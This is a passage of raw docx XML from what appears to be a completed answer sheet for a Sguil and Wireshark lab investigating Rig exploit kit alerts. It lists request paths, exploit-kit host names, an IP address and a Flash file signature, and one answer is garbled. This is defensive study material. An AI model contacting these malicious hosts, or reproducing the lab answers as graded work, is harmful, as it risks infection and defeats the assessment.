      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS Rig EK URI Struct Mar 13 2017 M2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>) and open the transcript. According to the information in the transcript answer the following questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A31FB7">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number of requests and responses were involved in this alert:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B046DBF">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3 requests and 3 responses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63F3100D">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first request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EBBB07D">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GET /?ct=Vivaldi&amp;biw=Vivaldi.95ec</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016EAF96">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Who was the referrer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E52D0DB">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www.homeimprovement.com/remodeling-your-kitchen-cabinets.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A23205A">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host server request to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509CE3EA">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tyu.benme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DE06795">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response encoded:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F27993">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Yes, gzip</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="352EC9F4">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second request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F066F67">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POST /?oq=CEh3h8…. Vivaldi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14ECB37D">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host server request to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57AE798E">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tyu.benme.com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48633AF8">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third request is:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21DA1B2E">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="226" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>GET /?biw=SeaMonkey.105….</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47517A71">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referrer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD32CE0">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http://tyu.benme.com/?biw…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F6D4F77">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 xml:space="preserve"> the Content-Type of the third response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E43A5">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application/x-shockwave-flash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E3E0DC">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>the first 3 characters of the data in the response:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC612B8">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data starts after the last </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>DST:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t> entry.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC8E766">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CWS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326203A1">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CWS is a file signature. File signatures help identify the type of file that is represented different types of data. Go to the following website </w:t>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:instrText xml:space="preserve"> HYPERLINK "https://en.wikipedia.org/wiki/List_of_file_signatures" \t "https://itexamanswers.net/_blank" </w:instrText>
      </w:r>
      <w:r>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>https://en.wikipedia.org/wiki/List_of_file_signatures</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="17"/>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:u w:val="none"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>. Use Ctrl-F to open a find box. Search for this file signature to find out what type of file was downloaded in the data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75320D94">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type of file was downloaded,  application uses this type of file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C3FDBA8">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swf, Adobe Flash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58DA7D4B">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e. Close the transcript window.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5105881A">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f. Right-click the same ID again and choose Network Miner. Click the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="19"/>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Files</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t> tab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C432FD3">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="0" w:after="300" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>The number of files are there and what is the file types:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="188E9E73">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="226" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="sans-serif"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>There are three files. Two are .html files and one is the .swf file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326171BA">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:ind w:left="660"/>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Use Wireshark to Investigate an Attack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F54BF24">
      <w:pPr>
        <w:pStyle w:val="3"/>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In Part 3, you will pivot to Wireshark to closely examine the details of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5135A85C">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:num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Pivot to Wireshark and Change Settings.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1288BAED">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In Sguil, right-click the alert ID 5.2 (Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRENT_EVENTS Evil Redirector Leading to EK Jul 12 2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>) and pivot to select Wireshark from the menu. The pcap that is associated with this alert will open in Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2277BFFC">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>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The default Wireshark setting uses a relative time per-packet which is not very helpful for isolating the exact time an event occurred. To fix this, select to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>View &gt; Time Display Format &gt; Date and Time of Day</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and then repeat a second time, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>View &gt; Time Display Format &gt; Seconds</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>. Now your Wireshark Time column has the date and timestamps. Resize the columns to make the display clearer if necessary.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="670CEEA0">
      <w:pPr>
        <w:pStyle w:val="45"/>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3790315" cy="1600200"/>
            <wp:effectExtent l="19050" t="19050" r="19685" b="19050"/>
            <wp:docPr id="28" name="Picture 28" descr="screenshot of wireshark with the first ent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of wireshark with the first entry highligh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811394" cy="1609255"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="762B6649">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>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Investigate HTTP Traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79FFE984">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:keepNext/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>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In Wireshark, use the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> display filter to filter for web requests only.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69AE557A">
      <w:pPr>
        <w:pStyle w:val="45"/>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5260340" cy="958850"/>
            <wp:effectExtent l="19050" t="19050" r="16510" b="12700"/>
            <wp:docPr id="18" name="Picture 18" descr="screenshot of wireshark with the first entry highlighted and http.request fil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of wireshark with the first entry highlighted and http.request filter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68" cy="961391"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="304EF3B4">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Select the first packet. In the packet details area, expand the Hypertext Transfer Protocol application layer data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32E256">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FE80732">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>The website that directed the user to the www.homeimprovement.com website:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6368FBF4">
      <w:pPr>
        <w:pStyle w:val="43"/>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Type </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Bing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ers here.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D96A3F8">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:num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View HTTP Objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="271D4340">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In Wireshark, choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>File &gt; Export Objects &gt; HTTP</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A9C625">
      <w:pPr>
        <w:pStyle w:val="41"/>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In the Export HTTP objects list window, select the remodeling-your-kitchen-cabinets.html packet and save it to your home folder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DDE0C7">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Close Wireshark. In Sguil, right-click the alert ID 5.24 (source IP address </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>139.59.160.143</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> and Event Message </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>ET CURRRENT_EVENTS Evil Redirector Leading to EK March 15 2017</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">) and choose </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Wireshark</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> to pivot to Wireshark. Apply an </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>http.request</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> display filter and answer the following questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380ACC9B">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="32"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F04F6C6">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>the http request for:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7C0AE2">
      <w:pPr>
        <w:pStyle w:val="43"/>
        <w:ind w:left="0"/>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eastAsia="Helvetica" w:cs="Times New Roman"/>
          <w:i w:val="0"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>A JavaScript file that is named dle_js.js.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBA4ACE">
      <w:pPr>
        <w:pStyle w:val="42"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>the host server</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="40"/>
          <w:rtl/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED49E58">
      <w:pPr>
        <w:pStyle w:val="18"/>
        <w:spacing w:before="226" w:beforeAutospacing="0" w:after="226" w:afterAutospacing="0"/>
        <w:textAlignment w:val="baseline"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="cs" w:eastAsia="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w:rtl/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Helvetica"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:shd w:val="clear" w:color="auto" w:fill="D4EDDA"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>retrotip.visionurbana.com.ve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCB8A2F">
      <w:pPr>
        <w:pStyle w:val="41"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="36"/>
          <w14:textFill>
            <w14:solidFill>
